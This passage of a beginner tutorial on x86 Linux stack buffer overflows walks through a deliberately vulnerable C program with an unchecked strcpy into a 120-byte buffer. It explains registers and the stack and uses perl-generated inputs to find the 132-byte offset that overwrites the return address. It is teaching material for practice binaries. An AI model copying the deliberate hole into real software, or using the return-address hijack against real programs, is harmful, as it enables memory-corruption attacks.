Travis x86 bof tutorial 01

From JaxHax



Downloads

Download Link: X86_linux_bof_tut01_v1.0.tar.gz
File Size: 5,291 bytes
MD5 Sum: 38da23ac176e7f179d85b9d40d164026


Lesson Objective

In this lesson, you will use a buffer overflow to overwrite the return address and hijack the execution flow of a program, making it do something it was never intended to do: in this case, run the not_called() function. As the name implies, not_called() is never called and should never execute. If we can make it run, we have taken control of the program's execution flow and forced it to run code that exists in the program but was never supposed to be run.


This example is designed to be simple to follow, even for the absolute beginner. It displays addresses in the program output, which means this lesson can be completed without ever using a debugger. This walkthrough will not show how to do it with a debugger, but you are encouraged to try, because later lessons will not print addresses like this. Since this is the first lesson, you get some training wheels for now; however, you should learn not to depend on them. If you need a primer on GDB and debugging in Linux, see here. The first few lessons are designed to remove some complexity, but once you understand them you should also work through them manually with a debugger, using the printed addresses to verify your work.


What You Should Take Away From This Lesson

  • How to use a large amount of data to overflow the buffer.
  • See how it overwrites the return address to main() on the stack in vuln().
  • How to determine the length so you can control the overwrite value to hijack execution flow.
    • Manually
    • Via Metasploit's pattern tools
  • How to pass binary data as an argument to the program.
  • How to format the address to not_called() in little endian for the overwrite.


Source Code

//////////////////////////////////////////////////////////////////////
//
// Program: x86_linux_bof_tut01.c
//
// Version: v1.0
//
// Date: 04/25/2016
//
// Author: Travis Phillips
//
// Website: http://wiki.jaxhax.org/index.php/Travis%27_x86_Linux_Buffer_Overflow_Tutorial_Series
//
// Purpose: To provide an example binary that demos using a buffer
//          overflow to overwrite the return address to hijack
//          execution flow of a program and make it do something it
//          wasn't intended to do; in this case, run the not_called()
//          function.
//
// Lessons you should learn:
//       - How to use a large amount of data to overflow the buffer.
//       - See how it overwrites the return address to main() on the stack in vuln().
//       - How to determine the length so you can control the
//            overwrite value to hijack execution flow.
//       - How to format the address to not_called() in little endian for the overwrite.
//
// Compile: gcc -m32 -fno-stack-protector x86_linux_bof_tut01.c -o x86_linux_bof_tut01
//
// License: Creative Commons Attribution + ShareAlike (CC BY-SA).
//
// License Notice: You are free to copy, share, and modify the work here.
//                 You must however credit the author and website of the
//                 original work and keep this license notice. The share-alike
//                 also requires the license of the work stay on a similar license.
//
//////////////////////////////////////////////////////////////////////
 
#include <stdio.h>   // for printf() and puts()
#include <string.h>  // for strcpy()
#include <stdlib.h>  // for exit()
 
////////////////////////////////////////////
// Constants
////////////////////////////////////////////
static const char TITLE[] = "BoF Tutorial One";
static const char VERSION[] = "v1.0";
static const int ARGCOUNT = 2;
static const char ARGSTR[] = "[String]";
static const char OBJECTIVE[] = "Exploit Bof and run not_called()";
static const char * const OBJECTIVES[] = {
	"\t- How to use a large amount of data to overflow the buffer.",
	"\t- See how it overwrites the return address to main() on the stack in vuln().",
	"\t- How to determine the length so you can control the",
	"\t    overwrite value to hijack execution flow.",
	"\t- How to format the address to not_called() in little endian for the overwrite."
};
 
////////////////////////////////////////////
// Support Functions - You can ignore these
////////////////////////////////////////////
 
// A basic banner printer function. This is here to make my life easier.
void printBanner() {
	printf("\n\t\033[1m---===[ %s %s ]===---\033[0m\n", TITLE, VERSION);
	printf("\t\t\033[33;1mCode By:\033[0m Travis Phillips\n");
	printf("\t\t\033[33;1mWebsite:\033[0m http://wiki.jaxhax.org/index.php/Travis%27_x86_Linux_Buffer_Overflow_Tutorial_Series\n\n");
}
 
// A function to print the objective.
void printObjective() {
	// Let the user know the objective
	printf(" [*] \033[31;1mObjective\033[0m: %s\n", OBJECTIVE);
}
 
// A function to make sure we got the required arguments. if not then
// print the usage and objectives of the lesson and exit.
void checkArgs(int argc, char *prog_name) {
	size_t i = 0;
	if (argc != ARGCOUNT) {
		printf(" [*] \033[33;1mUsage\033[0m: %s %s\n\n", prog_name, ARGSTR);
		puts(" [*] \033[32;1mLessons you should learn\033[0m:");
		for(i = 0; i < sizeof(OBJECTIVES) / sizeof(OBJECTIVES[0]); i++){
			printf("%s\n", OBJECTIVES[i]);
		}
		printf("\n");
		exit(0);
	}
}
 
////////////////////////////////////////////
// Unique Code to This Lesson
////////////////////////////////////////////
 
// This function isn't actually called and should *NEVER* run... in theory anyways.
void not_called(char *data){
	puts("\n\t\033[32;1m[*] Code Execution redirected to not_called(), YOU WIN!\n\033[0m");
	exit(0);
}
 
// a function with a vulnerability that is called from main()
void vuln(char *data){
	// declare a local buffer of 120 bytes.
	char buffer[120];
 
	// Let the user know they are in vuln.
	puts(" [*] in vuln()");
 
	// Show them the current return address on the stack for reference.
	printf(" [*] Return address from vuln() is currently: 0x%08x\n", __builtin_return_address(0));
 
	// Perform a strcpy. This is the vulnerable code since we don't know
	// if the data will fit.
	puts(" [*] Begining strcpy to local buffer...");
	strcpy(buffer, data);
	puts(" [*] strcpy to local char buffer complete");
 
	// Print the return address again, this will let the user see if the overflow occurred.
	printf(" [*] Return address from vuln() is currently: 0x%08x\n", __builtin_return_address(0));
 
	// Let the user know they will be returning from vuln().
	puts(" [*] Returning from Vuln()");
}
 
// main() is the start of the program.
int main(int argc, char **argv) {
	// Print the banner.
	printBanner();
 
	// Print the objective.
	printObjective();
 
	// Check if we got an argument. If not, print the usage.
	checkArgs(argc, argv[0]);
 
	// Let the user see the address of not_called().
	printf(" [*] Current address of not_called() is: 0x%08x\n", not_called);
 
	// Call the vulnerable function.
	puts(" [*] Calling Vuln()");
	vuln(argv[1]);
 
	// Let the user know they are back in main.
	puts(" [*] Back in main()");
 
	// Let the user know it is exiting normally.
	puts(" [*] Exiting program normally\n");
	return 0;
}


Code Breakdown

So at a glance, there appears to be a lot going on here. Truth is, there isn't. Much of it is boilerplate that gives every lesson the same structure. I will cover those parts in this first lesson so you know what they are and can safely ignore them afterwards.


Top Comment Block

//////////////////////////////////////////////////////////////////////
//
// Program: x86_linux_bof_tut01.c
//
// Version: v1.0
//
// Date: 04/25/2016
//
// Author: Travis Phillips
//
// Website: http://wiki.jaxhax.org/index.php/Travis%27_x86_Linux_Buffer_Overflow_Tutorial_Series
//
// Purpose: To provide an example binary that demos using a buffer
//          overflow to overwrite the return address to hijack
//          execution flow of a program and make it do something it
//          wasn't intended to do; in this case, run the not_called()
//          function.
//
// Lessons you should learn:
//       - How to use a large amount of data to overflow the buffer.
//       - See how it overwrites the return address to main() on the stack in vuln().
//       - How to determine the length so you can control the
//            overwrite value to hijack execution flow.
//       - How to format the address to not_called() in little endian for the overwrite.
//
// Compile: gcc -m32 -fno-stack-protector x86_linux_bof_tut01.c -o x86_linux_bof_tut01
//
// License: Creative Commons Attribution + ShareAlike (CC BY-SA).
//
// License Notice: You are free to copy, share, and modify the work here.
//                 You must however credit the author and website of the
//                 original work and keep this license notice. The share-alike
//                 also requires the license of the work stay on a similar license.
//
//////////////////////////////////////////////////////////////////////

The first section is just comments that provide information about the program. Anything from "//" to the end of the line is a comment. Comments are ignored by the compiler; they are there for the developer to leave notes on the code, and they are not put into the binary in any way. You can skip them, though they are useful for understanding what's going on, assuming the developer wrote good comments.


An important section to be aware of here is the "Compile:" section. This gives you the command line I used to build the program. In this case I use the "-m32" switch, which forces the compiler to build a 32-bit x86 binary, and "-fno-stack-protector", which ensures stack canaries are turned off (on Debian they aren't used by default, but on Ubuntu they are). A stack canary is a marker value that the compiler places on the stack between a function's local variables and the saved EBP and return address. If the canary has been corrupted when the function is about to return, it is safe to assume that "stack smashing" (a buffer overflow or some other memory corruption bug) occurred, so the program aborts instead of returning, which may dump core.


Includes

#include <stdio.h>   // for printf() and puts()
#include <string.h>  // for strcpy()
#include <stdlib.h>  // for exit()

This section tells the preprocessor to include the header files that declare the standard library functions the program uses (the functions themselves come from the C library at link time). The comments to the right explain why each header is there.


Constants Section

////////////////////////////////////////////
// Constants
////////////////////////////////////////////
static const char TITLE[] = "BoF Tutorial One";
static const char VERSION[] = "v1.0";
static const int ARGCOUNT = 2;
static const char ARGSTR[] = "[String]";
static const char OBJECTIVE[] = "Exploit Bof and run not_called()";
static const char * const OBJECTIVES[] = {
	"\t- How to use a large amount of data to overflow the buffer.",
	"\t- See how it overwrites the return address to main() on the stack in vuln().",
	"\t- How to determine the length so you can control the",
	"\t    overwrite value to hijack execution flow.",
	"\t- How to format the address to not_called() in little endian for the overwrite."
};

This section is just some constants that make my life as the developer easier by centralizing, in one spot, all the values that need to be updated from lesson to lesson. Since these are simple values and marked as constants, they shouldn't matter to you as the hacker.


Support Function Section

////////////////////////////////////////////
// Support Functions - You can ignore these
////////////////////////////////////////////
 
// A basic banner printer function. This is here to make my life easier.
void printBanner() {
	printf("\n\t\033[1m---===[ %s %s ]===---\033[0m\n", TITLE, VERSION);
	printf("\t\t\033[33;1mCode By:\033[0m Travis Phillips\n");
	printf("\t\t\033[33;1mWebsite:\033[0m http://wiki.jaxhax.org/index.php/Travis%27_x86_Linux_Buffer_Overflow_Tutorial_Series\n\n");
}
 
// A function to print the objective.
void printObjective() {
	// Let the user know the objective
	printf(" [*] \033[31;1mObjective\033[0m: %s\n", OBJECTIVE);
}
 
// A function to make sure we got the required arguments. if not then
// print the usage and objectives of the lesson and exit.
void checkArgs(int argc, char *prog_name) {
	size_t i = 0;
	if (argc != ARGCOUNT) {
		printf(" [*] \033[33;1mUsage\033[0m: %s %s\n\n", prog_name, ARGSTR);
		puts(" [*] \033[32;1mLessons you should learn\033[0m:");
		for(i = 0; i < sizeof(OBJECTIVES) / sizeof(OBJECTIVES[0]); i++){
			printf("%s\n", OBJECTIVES[i]);
		}
		printf("\n");
		exit(0);
	}
}

This section contains functions that will likely appear in every lesson. The three functions here provide simple, consistent formatting across lessons: one prints the banner, the next prints the objective, and the last checks that the program got the required arguments, printing the usage and exiting if it didn't. These are the functions that use the values from the constants section.


"Unique Code" Comment Header

////////////////////////////////////////////
// Unique Code to This Lesson
////////////////////////////////////////////

This comment marks where the code relevant to the lesson begins. I will try to keep code that is unique to each lesson BELOW this comment.


main() Function

// main() is the start of the program.
int main(int argc, char **argv) {
	// Print the banner.
	printBanner();
 
	// Print the objective.
	printObjective();
 
	// Check if we got an argument. If not, print the usage.
	checkArgs(argc, argv[0]);
 
	// Let the user see the address of not_called().
	printf(" [*] Current address of not_called() is: 0x%08x\n", not_called);
 
	// Call the vulnerable function.
	puts(" [*] Calling Vuln()");
	vuln(argv[1]);
 
	// Let the user know they are back in main.
	puts(" [*] Back in main()");
 
	// Let the user know it is exiting normally.
	puts(" [*] Exiting program normally\n");
	return 0;
}

The main() function is where a C/C++ program's own code starts running when the program is launched, so it is a good place to start a code audit. This instance of main() is simple: it calls our three support functions, then uses printf() to show the address of the not_called() function. You will need this address if you want your exploit to run it. Next we call vuln(), which is our vulnerable function. If the buffer overflow exploit is successful, vuln() will never return here. If it does return, we just let the user know we made it back to main() and then exit with a status code of zero.


vuln() Function

// a function with a vulnerability that is called from main()
void vuln(char *data){
	// declare a local buffer of 120 bytes.
	char buffer[120];
 
	// Let the user know they are in vuln.
	puts(" [*] in vuln()");
 
	// Show them the current return address on the stack for reference.
	printf(" [*] Return address from vuln() is currently: 0x%08x\n", __builtin_return_address(0));
 
	// Perform a strcpy. This is the vulnerable code since we don't know
	// if the data will fit.
	puts(" [*] Begining strcpy to local buffer...");
	strcpy(buffer, data);
	puts(" [*] strcpy to local char buffer complete");
 
	// Print the return address again, this will let the user see if the overflow occurred.
	printf(" [*] Return address from vuln() is currently: 0x%08x\n", __builtin_return_address(0));
 
	// Let the user know they will be returning from vuln().
	puts(" [*] Returning from Vuln()");
}

The function vuln() is where the issue lies. It sets up a 120-byte local buffer and reports that it is in vuln(), making it easy to know where execution is without a debugger. It then prints the current return address so the user can see its value before the call to strcpy(), which is what allows the buffer overflow. The next three lines print a message, call strcpy(), and print another message, so the user knows when the copy starts and ends. The strcpy() call is what creates the actual issue: we let strcpy() copy a user-controlled string into a fixed 120-byte buffer without checking whether the input is too big to fit. If it is, strcpy() keeps copying data past the end of the buffer on the stack, overwriting whatever was there with the bytes from our string.


After the call to strcpy(), we print the return address again. This lets the user compare the values before and after the strcpy() call; if the overflow reached the return address, the two values will differ. After that we let the user know we are returning from vuln(), which will return to whatever the second printed return address is. If the program wasn't exploited, that is main(). If it was exploited successfully, it may be not_called(). If the user overflowed the buffer but didn't overwrite the return address with a usable value, the program will most likely segfault.


not_called() Function

// This function isn't actually called and should *NEVER* run... in theory anyways.
void not_called(char *data){
	puts("\n\t\033[32;1m[*] Code Execution redirected to not_called(), YOU WIN!\n\033[0m");
	exit(0);
}

This function is never called, which is exactly why the goal of this lesson is to make it run by exploiting the buffer overflow. It simply prints a message telling the user they successfully ran it and won, and then exits with status code 0.


Walkthrough

So before we dive into attacking this, let's take a quick crash course in x86 Linux assembly, the stack, and Linux calling conventions.


ASM Crash Course - Important Registers

In x86 assembly there are some special-purpose registers you need to know about when you start exploiting buffer overflows. Registers in 32-bit x86 are small 32-bit storage locations built into the processor for holding the data it is currently working with. Compiled code uses them instead of RAM whenever it can, because they are much faster to access: the data doesn't have to travel across the bus between the CPU and RAM. The three registers that are really important to us for exploiting BoFs are EIP, ESP, and EBP.

  • EIP - Extended Instruction Pointer - Points to the address of the next instruction to be executed.
  • ESP - Extended Stack Pointer - Points to the address that is the top of the current stack frame.
  • EBP - Extended Base Pointer - Points to the address that is the bottom of the current stack frame.

EIP can't be read or written directly by ordinary instructions such as MOV, PUSH, or POP. Besides advancing normally as instructions execute, it is changed by control-flow instructions such as CALL, RET, and the various jumps.


ASM Crash Course - Some Important Instructions

In x86 assembly, instructions are mnemonic "codes" that each perform a specific action. The ones we are interested in for now are MOV, PUSH, POP, ADD, SUB, CALL, LEAVE, and RET. The descriptions below use Intel syntax, where the destination is the first operand.


  • MOV [reg], [imm/reg] - MOV is short for MOVE. It copies the second operand, which can be a register or an immediate value such as a number, into the register given as the first operand. If the second operand is a register, its value is left unchanged, so afterwards both registers hold the same value. This is useful for making a copy of a value before modifying it, or just for quickly slinging data to another register.
    • Example: MOV EBP, ESP


  • PUSH [imm/reg] - pushes a value onto the top of the stack. The value may be an immediate value, such as a number, or a register, in which case the value of that register is placed onto the stack. ESP is decreased by 4 so that it points to the newly added value, which is now the "top" of the stack.
    • Example: PUSH ESP
    • Example: PUSH 0xDEADBEEF


  • POP [reg] - retrieves, or "pops", the value on top of the stack into the register given as the operand. ESP is then increased by 4, so that value is no longer the top of the stack. The data isn't erased; the stack simply treats it as removed.
    • Example: POP EBP


  • ADD [reg], [imm/reg] - adds the second operand to the first one and stores the sum in the first operand's register. The second operand may be a register or an immediate value, such as a number.
    • Example: ADD ESP, 0x10


  • SUB [reg], [imm/reg] - same as add, but with subtraction instead of addition.
    • Example: SUB ESP, 0x10


  • CALL [location] - This instruction pushes the address of the instruction following it onto the stack, then jumps to the location specified. That address is pushed so that when the called function returns, it knows where to go back to: the instruction right after this CALL.
    • Example: CALL <vuln>


  • LEAVE - Takes no arguments. This is basically a shorthand instruction that translates to the following two instructions: MOV ESP, EBP; POP EBP. This instruction is used at the end of a function to remove the current stack frame and revert to the one that existed before the current function was called. We will go more into this when we cover the stack and calling conventions, so don't sweat it if this isn't clear at this point.


  • RET - Takes no arguments. This one basically translates into POP EIP: whatever value is on top of the stack when this instruction is executed is placed into EIP, the special-purpose register that tells the CPU the address of the next instruction to execute. RET is short for RETURN. So when RET is executed, the top of the stack should hold the address of the instruction in the calling function that comes right after its CALL.


The Stack

The stack is a section of memory, usually in the higher memory range (0xff######) in x86, used to store data. We need it because there are only a few registers and each stores only 32 bits of data, which isn't even enough to hold a sentence of text. The stack grows toward lower addresses: as data is pushed onto the stack, the ESP value decrements. Debuggers usually draw the stack with the lowest address at the top, which is why it is often described as growing "upward". The stack is generally thought of as a data structure that data is "pushed" onto (hence the x86 assembly instruction PUSH) and "popped" off of (hence the x86 assembly instruction POP). It works in a FILO (First In Last Out) fashion: the item on top of the stack (which is the last thing pushed) is the first thing out. This means that if I pushed the value 0xdeadbeef onto the stack and then pushed 3 more values I don't care about, I would need to pop those three values off the stack before I could pop 0xdeadbeef.


To keep things structured, a program's functions use what are known as "stack frames" to partition off a section of the stack for their own use when they are called. This is where EBP (Extended Base Pointer) comes in. Recall that EBP points to the address at the bottom of the current stack frame and ESP points to the top. A stack frame is usually created when a function is entered, and when the function ends it reverts to the caller's stack frame, so that when it returns to the function that called it, the stack is just the way that function left it.


When a function is entered, EBP still points to the bottom of the caller's stack frame and ESP to the top of the stack. The new function creates its own stack frame by:

  • Push the value in EBP (a pointer to the bottom of the stack frame of the previous function) onto the stack to save it for later recovery.
  • Move the value of ESP (points to the top of the stack) into EBP (pointer to the bottom of the stack frame), so EBP now points to the top of the stack and ESP and EBP are the same.
  • Then usually some sort of "sub esp, X" instruction, where X is a number, to grow the stack upwards from EBP. We now have a stack frame ;-)


Here is an example of these instructions building a stack frame at the beginning of the vuln() function in the provided binary:
X86 linux bof01 vuln function entry.png


Once the function ends it will usually:

  • invoke the "LEAVE" instruction, which is basically the instructions "MOV ESP, EBP; POP EBP"
    • MOV ESP, EBP - sets ESP to point to the same value as EBP, this pretty much closes the stack frame and ESP will point to the saved EBP value that was saved to the stack.
    • Since ESP points to the saved EBP value on the stack, it does a "POP EBP" instruction. Now the old stack frame from the previous function was restored.
  • invoke the "RET" instruction, which sets EIP to whatever value it pops off the stack. That should be the address of the instruction that follows the CALL that invoked this function. More on this in the next section.


And a sample of the "LEAVE; RET" code happening at the end of vuln() in the provided sample binary.
X86 linux bof01 vuln function end.png


Linux C Calling Conventions

In x86 the "CALL" instruction is used to jump to another function. When the program reaches this instruction, it pushes the address of the instruction that follows the CALL onto the stack (saving it so the RET instruction at the end of the called function knows where to return to) and then jumps to the function being called. The image below shows two steps. The top one is in main() at a CALL instruction. The second is after we issued a "step into" command in the debugger, which executes the current instruction and, if it is a call, follows it. You will notice that the CALL points to an address, and that address is the instruction we are on in the bottom image. You will also notice that the address of the instruction after the CALL in the top image is on the top of the stack in the bottom image. It was saved there so RET will know where to go when the called function is finished.


X86 linux bof01 call example.png


So the function does its thing, and at the end it reaches a "RET" instruction. This takes the value that ESP is pointing to on the stack and sets it as the value of EIP. Below is an image showing this in action in a debugger, from the vuln() function in the provided example binary.


X86 linux bof01 ret example.png


On With the Show: Where Should We Start

So now that we are done with our crash course primer, where should we begin with this actual lesson against the binary provided to you? First I would like to point out that a debugger isn't needed at all to exploit this example binary. I have programmed it so it will give you all the information, primarily addresses, in the console. It is good to use this one as a way to get more comfortable with using a debugger even though it isn't needed right now. The reason for this is that this binary is friendly to step through since it gives you so much information.

So where I normally like to start is by running "file" and "checksec.sh" against the binary, beginning with the "file" command. The file command tries to display useful information about the file passed to it. To run it, just type "file <path_to_file>" in a terminal. So let's run file against the provided binary for this lesson:


X86 linux bof01 file.png


Based on the information in the output from the command, we can see:

  • It is an ELF binary, which is a type of executable program format in Linux.
  • It is a 32 bit binary for the Intel x86 architecture.
  • It is dynamically linked, which means it loads shared libraries (such as the C library) at run time. This is common for C programs and is the compiler's default unless it is told to link statically.
  • It uses /lib/ld-linux.so.2 to load and "interpret" the ELF file.
  • That this is for Linux.
  • That it is *NOT* stripped. This means its symbol table has not been stripped out, so GDB will be able to label functions by name for us. This is very useful when you have to debug it.


File provided us with a wealth of information. Let's get more by using checksec.sh. The checksec.sh script tries to determine which security countermeasures are in place on the binary. To use it, run "checksec.sh --file <Path_to_ELF_binary>" in a terminal. Alternatively, this functionality is built into GDB-PEDA: just run "checksec" in GDB with the PEDA.py plug-in loaded, and it will run against the binary being debugged:


Checksec.sh script in action: X86 linux bof01 checksec.png


Checksec being run from within GDB-PEDA:
X86 linux bof01 checksec peda.png


As a hacker trying to exploit the binary, we are interested in the green text, as it represents mitigations that are in place that we would need to circumvent. None of these really concern us for this example, as it was intended to be simple, but I wanted you to see this in action. "NX" basically means the binary supports what is commonly known as "DEP". In a nutshell, this means the system should remove the execute permission from writable sections of memory and remove the write permission from memory that is executable, so that memory can be writable or executable, but not both. This makes it harder to inject malicious binary code (known as shellcode) into the process and run it: a section we can write shellcode to can't execute code, and sections that can execute code won't let us write there. This isn't important for this lesson, but it will come up in later lessons when we talk about circumventing DEP protections. I just wanted to expose you to DEP now; if you want to learn more about it on the side, check out the information here.


Testing The Waters: Blank Run

Now that we have a general idea about the binary, let's run it without any parameters being passed to it. I built these to display help if it is not given a parameter. It will tell you what the objective of the program is and what lessons you should be learning from this example.


X86 linux bof01 blank run.png


So we can see it also gives us the usage syntax.


Testing The Waters: Some Input

So let's give it a little bit of data to see it run.


X86 linux bof01 little input run.png


So we get an actual run this time. This output shows us some important stuff we will want to know:

  • It gave us the address of the not_called() function.
  • Told us when it entered the vuln() function.
  • Showed us the current return address from vuln() before triggering the strcpy() vulnerability.
  • Showed us when the vulnerable strcpy() call started and finished.
  • Showed us the current return address from vuln() again after the strcpy() call.
  • Told us when it was returning from vuln().
  • Told us it made it back to main() from the RET in vuln().
  • Then it exits.


Testing The Waters: A Lot of Input

Now let's see what happens if we give it a lot of data, say 200 bytes of it. We will use Perl to create the string for us using command substitution, $(), which runs the command inside it and puts its output where the $() was.


X86 linux bof01 Lots of data.png


RUH-ROH! It crashed this time. From the output we can see some interesting stuff here:

  • The last output line was " [*] Returning from Vuln()", which means it crashed when it tried to RET.
  • The two "Return address from vuln()" lines are different. This is kind of a big deal. ;-)
    • The second return address displays 0x41414141.
    • This is interesting because the ASCII value of "A" is 0x41 in hex. So our return address is basically "AAAA".
    • If you are not familiar with ASCII and how to convert it, see here


What Just Happened?

Well, remember from the calling conventions section that CALL writes the return address to the stack, and the stack frame for vuln() (including our buffer) is then built at lower addresses as the stack grows upward. strcpy() writes our data in the opposite direction, downward toward higher addresses, which means the data heads right towards the saved EBP and the saved return address on the stack. The 120 bytes is the size of the buffer: the compiler set up the stack frame for that function to reserve at least that much space, but that is by no means a hard limit on the data going into it. It is the programmer's responsibility to make sure the data doesn't exceed the buffer size; strcpy() is happy to keep copying until it finds the null byte that terminates the string. Let's take a look at the stack from the two runs we did, from the start of the buffer to the return address, right after the strcpy() call to see what happened.


Let's start with the "A" x 4 input:
X86 linux bof01 stack view AAAA.png


Now let's look at the same view, but with "A" x 200 input:
X86 linux bof01 stack view lots of A.png


As we can see in the second picture, the 200 bytes of "A" went well past the 120-byte buffer and overwrote the saved EBP and the return address. This is why the program crashed: 0x41414141 isn't a valid address in this program. It is also why we saw that value as the return address in the program output in the last section. Now let's see what the stack looks like at the RET instruction in vuln() for both the 4-byte and the 200-byte runs.
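To see the same overwrite without crashing anything, here is a minimal C sketch that simulates the frame as a plain byte array and copies input into it the way strcpy() does, with no bounds check. The layout is an assumption for illustration: the buffer starts at offset 0, the return address sits at offset 132 (the offset found later in this lesson), and the saved EBP occupies the 4 bytes just before it. The names FRAME_BYTES, init_frame(), simulated_strcpy() and the saved EBP value are hypothetical; only the normal return address 0x080486a4 comes from the lesson's output.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FRAME_BYTES      256   /* simulated frame, big enough for a 200-byte input */
#define SAVED_EBP_OFFSET 128   /* assumption: saved EBP is the 4 bytes before the return address */
#define RET_OFFSET       132   /* assumption: offset of the return address from the buffer start */

/* Read a 32-bit value stored little endian (as x86 does) at frame[off]. */
uint32_t read_le32(const uint8_t *frame, size_t off) {
    return (uint32_t)frame[off]
         | (uint32_t)frame[off + 1] << 8
         | (uint32_t)frame[off + 2] << 16
         | (uint32_t)frame[off + 3] << 24;
}

/* Store a 32-bit value little endian at frame[off]. */
void write_le32(uint8_t *frame, size_t off, uint32_t value) {
    for (size_t k = 0; k < 4; k++)
        frame[off + k] = (uint8_t)(value >> (8 * k));
}

/* Fresh frame: zeroed buffer, a placeholder saved EBP, and the normal
 * return address into main() printed by the lesson's program. */
void init_frame(uint8_t *frame) {
    memset(frame, 0, FRAME_BYTES);
    write_le32(frame, SAVED_EBP_OFFSET, 0xbffff000u);  /* hypothetical value */
    write_le32(frame, RET_OFFSET, 0x080486a4u);
}

/* Copy like strcpy(): everything up to and including the source's null
 * byte, ignoring the 120-byte buffer size. The assert only keeps the
 * simulation itself inside the array. */
void simulated_strcpy(uint8_t *frame, const char *input) {
    size_t len = strlen(input);
    assert(len + 1 <= FRAME_BYTES);
    memcpy(frame, input, len + 1);
}
```

With "AAAA" as input, read_le32(frame, RET_OFFSET) still returns 0x080486a4; with 200 "A"s, both the saved EBP and the return address read back as 0x41414141, matching the two stack views.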


4 byte "A" run:
X86 linux bof01 ret 4.png


200 byte "A" run:
X86 linux bof01 ret 200.png


Why do we care about this? Because if we can control that return address, we can make it jump to a location of our choice, effectively allowing us to hijack execution flow and make it execute something other than what it was supposed to execute. In the case of this example we want it to return to not_called() rather than return to main().


Okay. So How Can I Control the Return Address?

Well... it was our input that overwrote the return address, right? So in theory we can control the return address; we just have to figure out how many bytes of data are required before we reach the offset in the string that lands on it. There are a few ways to do that. The simplest is a unique pattern tool, such as the ones provided with the Metasploit Framework or GDB-PEDA. The other way, which is worth knowing if Metasploit isn't available and is how this was done before pattern tools came around, is to end the string with 4 bytes of a different character and keep adjusting the string length until the return address contains those 4 bytes. Nowadays this is the harder way to do it.


Finding the Offset to Overwrite the Return Address - The Hard Manual Way

In the past, the way to find how many bytes were needed was to send a run of junk characters (in our case "A"s, which are 0x41 in hex) followed by 4 repeating characters of something else (in our case "BBBB", which are 0x42 in hex). The goal is to keep adjusting the length of the junk string until the return address is filled exclusively with our suffix. One of the easiest ways to do this is the old half-range trick (a binary search). We start with a range of 0-200, because we know 200 overflows, cut it in half, send 100 bytes of junk plus the suffix, and see what happens to the return address. If it is 0x41414141, 100 becomes the new max of the range. If it is the normal return address, 100 becomes the new min. If you get a blend of 0x42 bytes with something else, you are really close: count how many 0x42 bytes are missing. If the rest are 0x41 bytes, the junk is too long, so subtract that count from the junk length; if the rest are the null terminator (0x00) or bytes of the original address, the junk is too short, so add that count instead. The table below shows this in action:

Run | Current Range | Middle of Range | Command | Return Address | Result
1 | 0-200 | 100 | ./x86_linux_bof_tut01 $(perl -e 'print "A"x100; print "BBBB"') | 0x080486a4 | 100 is the new min of the range.
2 | 100-200 | 150 | ./x86_linux_bof_tut01 $(perl -e 'print "A"x150; print "BBBB"') | 0x41414141 | 150 is the new max of the range.
3 | 100-150 | 125 | ./x86_linux_bof_tut01 $(perl -e 'print "A"x125; print "BBBB"') | 0x080486a4 | 125 is the new min of the range.
4 | 125-150 | 137 | ./x86_linux_bof_tut01 $(perl -e 'print "A"x137; print "BBBB"') | 0x41414141 | 137 is the new max of the range.
5 | 125-137 | 131 | ./x86_linux_bof_tut01 $(perl -e 'print "A"x131; print "BBBB"') | 0x00424242 | Almost! That 0x00 is the null terminator, so we are one byte short. Increasing the junk size by one should do the trick.
6 | 131-137 | 132 | ./x86_linux_bof_tut01 $(perl -e 'print "A"x132; print "BBBB"') | 0x42424242 | Boom! The return address is "BBBB" now. Let's change the suffix to "CCCC", which should give 0x43434343, just to verify.
7 | 132 | 132 | ./x86_linux_bof_tut01 $(perl -e 'print "A"x132; print "CCCC"') | 0x43434343 | Confirmed: 132 bytes of junk get us to the offset that overwrites the return address.


As the table shows, we determined in six runs that the offset is 132 bytes, and used a seventh run to confirm the result. However, this is "the hard way" to do it.
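The half-range search in the table is an ordinary binary search, so it can be written down as code. The C sketch below replays it against a simulated target rather than the real binary: simulated_ret() is a hypothetical stand-in that predicts the return address the program would print for "A" x n followed by "BBBB", assuming the return address sits 132 bytes into the buffer and the normal value is 0x080486a4 (both taken from this lesson). Against the real program you would replace simulated_ret() with actually running the binary and reading its output.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define ASSUMED_OFFSET 132u         /* where the return address really is (from the lesson) */
#define NORMAL_RET     0x080486a4u  /* return address printed on a normal run */
#define ALL_A          0x41414141u
#define ALL_B          0x42424242u

/* Byte found at index i after strcpy() of "A" x junk followed by "BBBB". */
static uint8_t byte_after_copy(size_t i, size_t junk) {
    if (i < junk) return 'A';
    if (i < junk + 4) return 'B';
    if (i == junk + 4) return 0x00;                          /* strcpy()'s null terminator */
    return (uint8_t)(NORMAL_RET >> (8 * (i - ASSUMED_OFFSET)));  /* untouched byte */
}

/* Hypothetical stand-in for one run: the return address it would print. */
uint32_t simulated_ret(size_t junk) {
    uint32_t value = 0;
    for (size_t k = 0; k < 4; k++)   /* little endian: lowest address is the lowest byte */
        value |= (uint32_t)byte_after_copy(ASSUMED_OFFSET + k, junk) << (8 * k);
    return value;
}

/* The half-range trick; returns the junk length that yields "BBBB", or -1. */
long find_offset(size_t lo, size_t hi) {
    while (hi - lo > 1) {
        size_t mid = lo + (hi - lo) / 2;
        uint32_t ret = simulated_ret(mid);
        if (ret == ALL_B) return (long)mid;
        if (ret == NORMAL_RET) { lo = mid; continue; }  /* didn't reach it: new min */
        if (ret == ALL_A)      { hi = mid; continue; }  /* went past it: new max */

        /* A blend: count the "B" bytes that landed in the return address. */
        size_t b_count = 0;
        for (size_t k = 0; k < 4; k++)
            if (((ret >> (8 * k)) & 0xffu) == 'B') b_count++;
        size_t missing = 4 - b_count;
        /* A low byte of 'A' means junk spilled into the address: too long. */
        int too_long = (ret & 0xffu) == 'A';
        size_t guess = too_long ? mid - missing : mid + missing;
        if (simulated_ret(guess) == ALL_B) return (long)guess;
        if (too_long) hi = mid; else lo = mid;          /* otherwise keep halving */
    }
    return -1;
}
```

Starting from find_offset(0, 200), the midpoints are 100, 150, 125, 137 and 131, the same sequence as the table; at 131 the blend 0x00424242 has one "B" missing and a non-"A" low byte, so the sketch adds one and lands on 132.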


Finding the Offset to Overwrite the Return Address - The Lazy Hacker Way

